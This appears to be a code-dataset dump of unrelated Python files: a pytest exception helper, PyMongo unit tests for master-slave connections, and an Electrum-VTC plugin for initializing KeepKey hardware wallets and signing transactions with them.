return expected
def external_error_raised(
expected_exception: Type[Exception],
) -> Callable[[Type[Exception], None], None]:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
|
test_master_slave_connection.py
|
# Copyright 2009-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for master slave connections."""
import datetime
import os
import sys
import threading
import time
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo import ReadPreference, thread_util
from pymongo.errors import ConnectionFailure, InvalidName
from pymongo.errors import CollectionInvalid, OperationFailure
from pymongo.errors import AutoReconnect
from pymongo.database import Database
from pymongo.mongo_client import MongoClient
from pymongo.collection import Collection
from pymongo.master_slave_connection import MasterSlaveConnection
from test import host, port, host2, port2, host3, port3
from test.utils import TestRequestMixin, get_pool
class TestMasterSlaveConnection(unittest.TestCase, TestRequestMixin):
def setUp(self):
self.master = MongoClient(host, port)
self.slaves = []
try:
self.slaves.append(MongoClient(
host2, port2, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
try:
self.slaves.append(MongoClient(
host3, port3, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
if not self.slaves:
raise SkipTest("Not connected to master-slave set")
self.client = MasterSlaveConnection(self.master, self.slaves)
self.db = self.client.pymongo_test
def tearDown(self):
try:
self.db.test.drop_indexes()
except Exception:
# Tests like test_disconnect can monkey with the client in ways
# that make this fail
pass
self.master = self.slaves = self.db = self.client = None
super(TestMasterSlaveConnection, self).tearDown()
def test_types(self):
self.assertRaises(TypeError, MasterSlaveConnection, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, [1])
def test_use_greenlets(self):
self.assertFalse(self.client.use_greenlets)
if thread_util.have_gevent:
master = MongoClient(host, port, use_greenlets=True)
slaves = [
MongoClient(slave.host, slave.port, use_greenlets=True)
for slave in self.slaves]
self.assertTrue(
MasterSlaveConnection(master, slaves).use_greenlets)
def test_repr(self):
self.assertEqual(repr(self.client),
"MasterSlaveConnection(%r, %r)" %
(self.master, self.slaves))
def test_disconnect(self):
class MongoClient(object):
def __init__(self):
self._disconnects = 0
def disconnect(self):
self._disconnects += 1
self.client._MasterSlaveConnection__master = MongoClient()
self.client._MasterSlaveConnection__slaves = [MongoClient(),
MongoClient()]
self.client.disconnect()
self.assertEqual(1,
self.client._MasterSlaveConnection__master._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[0]._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[1]._disconnects)
def test_continue_until_slave_works(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return (None, 'sent')
class NotRandomList(object):
last_idx = -1
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(False), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
NotRandomList.last_idx = idx
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
response = self.client._send_message_with_response('message')
self.assertEqual((NotRandomList.last_idx, 'sent'), response)
self.assertNotEqual(-1, NotRandomList.last_idx)
self.assertEqual(3, Slave.calls)
def test_raise_autoreconnect_if_all_slaves_fail(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return 'sent'
class NotRandomList(object):
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(True), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
self.assertRaises(AutoReconnect,
self.client._send_message_with_response, 'message')
self.assertEqual(4, Slave.calls)
def test_get_db(self):
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, self.client, "")
self.assertRaises(InvalidName, make_db, self.client, "te$t")
self.assertRaises(InvalidName, make_db, self.client, "te.t")
self.assertRaises(InvalidName, make_db, self.client, "te\\t")
self.assertRaises(InvalidName, make_db, self.client, "te/t")
self.assertRaises(InvalidName, make_db, self.client, "te st")
self.assertTrue(isinstance(self.client.test, Database))
self.assertEqual(self.client.test, self.client["test"])
self.assertEqual(self.client.test, Database(self.client,
"test"))
def test_database_names(self):
self.client.pymongo_test.test.save({"dummy": u"object"})
self.client.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
self.assertRaises(TypeError, self.client.drop_database, 5)
self.assertRaises(TypeError, self.client.drop_database, None)
raise SkipTest("This test often fails due to SERVER-2329")
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database("pymongo_test")
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database(self.client.pymongo_test)
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
def test_iteration(self):
def iterate():
[a for a in self.client]
self.assertRaises(TypeError, iterate)
def test_insert_find_one_in_request(self):
count = 0
for i in range(100):
self.client.start_request()
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.client.end_request()
self.assertFalse(count)
def test_nested_request(self):
client = self.client
def assertRequest(in_request):
self.assertEqual(in_request, client.in_request())
self.assertEqual(in_request, client.master.in_request())
# MasterSlaveConnection is special, alas - it has no auto_start_request
# and it begins *not* in a request. When it's in a request, it sends
# all queries to primary.
self.assertFalse(client.in_request())
self.assertFalse(client.master.in_request())
# Start and end request
client.start_request()
assertRequest(True)
client.end_request()
assertRequest(False)
# Double-nesting
client.start_request()
client.start_request()
client.end_request()
assertRequest(True)
client.end_request()
assertRequest(False)
def test_request_threads(self):
client = self.client
# In a request, all ops go through master
pool = get_pool(client.master)
client.master.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
started_request, ended_request = threading.Event(), threading.Event()
checked_request = threading.Event()
thread_done = [False]
# Starting a request in one thread doesn't put the other thread in a
# request
def f():
self.assertNotInRequestAndDifferentSock(client, pool)
client.start_request()
self.assertInRequestAndSameSock(client, pool)
started_request.set()
checked_request.wait()
checked_request.clear()
self.assertInRequestAndSameSock(client, pool)
client.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
ended_request.set()
checked_request.wait()
thread_done[0] = True
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
started_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
ended_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
t.join()
self.assertNotInRequestAndDifferentSock(client, pool)
self.assertTrue(thread_done[0], "Thread didn't complete")
# This was failing because commands were being sent to the slaves
def test_create_collection(self):
self.client.pymongo_test.test.drop()
collection = self.db.create_collection('test')
self.assertTrue(isinstance(collection, Collection))
self.assertRaises(CollectionInvalid, self.db.create_collection, 'test')
# Believe this was failing for the same reason...
def test_unique_index(self):
self.client.pymongo_test.test.drop()
self.db.test.create_index('username', unique=True)
self.db.test.save({'username': 'mike'})
self.assertRaises(OperationFailure,
self.db.test.save, {'username': 'mike'})
# NOTE this test is non-deterministic, but I expect
# some failures unless the db is pulling instantaneously...
def test_insert_find_one_with_slaves(self):
count = 0
for i in range(100):
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertTrue(count)
# NOTE this test is non-deterministic, but hopefully we pause long enough
# for the slaves to pull...
def test_insert_find_one_with_pause(self):
count = 0
self.db.test.remove({})
self.db.test.insert({"x": 5586})
time.sleep(11)
for _ in range(10):
try:
if 5586 != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertFalse(count)
def test_kill_cursor_explicit(self):
c = self.client
c.slave_okay = True
db = c.pymongo_test
test = db.master_slave_test_kill_cursor_explicit
test.drop()
for i in range(20):
test.insert({"i": i}, w=1 + len(self.slaves))
st = time.time()
while time.time() - st < 120:
# Wait for replication -- the 'w' parameter should obviate this
# loop but it's not working reliably in Jenkins right now
if list(test.find({"i": 19})):
break
time.sleep(0.5)
else:
self.fail("Replication timeout, test coll has %s records" % (
len(list(test.find()))
))
# Partially evaluate cursor so it's left alive, then kill it
cursor = test.find().batch_size(10)
self.assertNotEqual(
cursor._Cursor__connection_id,
-1,
"Expected cursor connected to a slave, not master")
self.assertTrue(cursor.next())
self.assertNotEqual(0, cursor.cursor_id)
cursor_id = cursor.cursor_id
# Cursor dead on server - trigger a getMore on the same cursor_id and
# check that the server returns an error.
cursor2 = cursor.clone()
cursor2._Cursor__id = cursor_id
if (sys.platform.startswith('java') or
'PyPy' in sys.version):
# Explicitly kill cursor.
cursor.close()
else:
# Implicitly kill it in CPython.
del cursor
self.assertRaises(OperationFailure, lambda: list(cursor2))
def test_base_object(self):
c = self.client
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({}, db.get_lasterror_options())
coll = db.test
coll.drop()
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({}, coll.get_lasterror_options())
cursor = coll.find()
self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
w = 1 + len(self.slaves)
wtimeout=10000 # Wait 10 seconds for replication to complete
c.set_lasterror_options(w=w, wtimeout=wtimeout)
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, db.get_lasterror_options())
coll = db.test
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout},
coll.get_lasterror_options())
cursor = coll.find()
self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
coll.insert({'foo': 'bar'})
self.assertEqual(1, coll.find({'foo': 'bar'}).count())
self.assertTrue(coll.find({'foo': 'bar'}))
coll.remove({'foo': 'bar'})
self.assertEqual(0, coll.find({'foo': 'bar'}).count())
c.safe = False
c.unset_lasterror_options()
self.assertFalse(self.client.slave_okay)
self.assertTrue(bool(self.client.read_preference))
self.assertFalse(self.client.safe)
self.assertEqual({}, self.client.get_lasterror_options())
def test_document_class(self):
c = MasterSlaveConnection(self.master, self.slaves)
db = c.pymongo_test
w = 1 + len(self.slaves)
db.test.insert({"x": 1}, w=w)
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c = MasterSlaveConnection(self.master, self.slaves, document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
def test_tz_aware(self):
dt = datetime.datetime.utcnow()
client = MasterSlaveConnection(self.master, self.slaves)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
w = 1 + len(self.slaves)
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=True)
self.assertEqual(True, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(utc, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=False)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
if __name__ == "__main__":
unittest.main()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_vtc.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_vtc.bip32 import BIP32Node
from electrum_vtc import constants
from electrum_vtc.i18n import _
from electrum_vtc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_vtc.keystore import Hardware_KeyStore
from electrum_vtc.plugin import Device, runs_in_hwd_thread
from electrum_vtc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password, *, script_type=None):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.